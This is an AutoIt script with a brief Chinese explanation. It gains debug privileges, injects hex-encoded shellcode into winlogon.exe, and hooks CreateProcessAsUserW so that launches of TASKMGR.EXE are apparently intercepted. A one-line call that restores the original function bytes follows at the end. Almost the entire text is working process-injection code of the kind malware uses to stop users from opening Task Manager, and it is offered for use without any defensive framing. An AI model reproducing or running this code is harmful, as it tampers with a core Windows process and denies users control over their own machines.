#include <Thread.au3>
#include <lsasecur.au3>
Const $tagHOOK_TASKMGR = "ptr CreateProcessAsUserW;ptr Breakpoint;ubyte OldEntrypoint[8];struct;align 1;ubyte Push;ptr Address;ubyte Ret;word Breakpoint1;endstruct;wchar wzImageName[52];ubyte ShellX[512]"
Const $pCreateProcessAsUserW = _RTGetProcAddress("advapi32.dll", "CreateProcessAsUserW")
$hToken = _SeOpenProcessToken(-1)
_SeAdjustTokenPriv($hToken, $SE_DEBUG_PRIV)
_SeCloseHandle($hToken)
$hProcess = _RTOpenProcess("winlogon.exe")
If $hProcess = 0 Then Exit BitOR(0x10000000, @error)
If _RTVirtualProtectEx($hProcess, $pCreateProcessAsUserW, 8) = 0 Then
Exit BitOR(0x20000000, @error)
EndIf
$pStartAddress = _RTVirtualAllocEx($hProcess, 4096)
If $pStartAddress = 0 Then Exit BitOR(0x30000000, @error)
$tBuffer = DllStructCreate($tagHOOK_TASKMGR)
$pBuffer = DllStructGetPtr($tBuffer)
DllStructSetData($tBuffer, "CreateProcessAsUserW", $pCreateProcessAsUserW)
DllStructSetData($tBuffer, "Breakpoint", 0xCCCCCCCC)
DllStructSetData($tBuffer, "Push", 0x68)
DllStructSetData($tBuffer, "Address", $pStartAddress + 0x80)
DllStructSetData($tBuffer, "Ret", 0xC3)
DllStructSetData($tBuffer, "Breakpoint1", 0xCCCC)
DllStructSetData($tBuffer, "wzImageName", "TASKMGR.EXE")
DllStructSetData($tBuffer, "ShellX", _GetShellX())
If _RTReadProcessMemory($hProcess, $pCreateProcessAsUserW, DllStructGetPtr($tBuffer, "OldEntrypoint"), 8) = 0 Then
Exit BitOR(0x40000000, @error)
EndIf
If _RTWriteProcessMemory($hProcess, $pStartAddress, $pBuffer, DllStructGetSize($tBuffer)) = 0 Then
Exit BitOR(0x50000000, @error)
EndIf
If _RTWriteProcessMemory($hProcess, $pCreateProcessAsUserW, DllStructGetPtr($tBuffer, "push"), 8) = 0 Then
Exit BitOR(0x60000000, @error)
EndIf
MsgBox(0, "OK", "Done")
Func _GetShellX()
Local $bBinary = "0x558BEC53E8000000005B81EB89000000E84000000085C0752D578B3BFF73088F07FF730C8F47046A0B598D4508FF7488FCE2FAFFD7FF73108F07FF73148F47045F5B5DC22C0064A1180000006A058F403433C0EBEC8B450C85C0741650E82E0000008D431850FF750CE85200000085C075198B451085C0741250E8110000008D431850FF7510E835000000C3CCCCCCCC558BECFC568B750885F6741D66AD6685C074166683F8617CF36683F87A7FED6625DF00668946FEEBE35E5DC20400CCCC558BEC8B4D088B550C668B01663B02740D6685C0741B83C1028B550CEBEB83C20266830A00740583C102EBDD33C040EB0233C05DC20800CCCCCCCCCC"
Return Binary($bBinary)
EndFunc ;==>_GetShellX
挂钩winlogon进程中,跨权限创建进程的函数CreateProcessAsUserW,并判断文件路径中时是否TASKMGR.EXE字串。
恢复函数:
_RTWriteProcessMemory($hProcess, $pCreateProcessAsUserW, "0x8BFF558BEC83EC10", 8, "binary")
|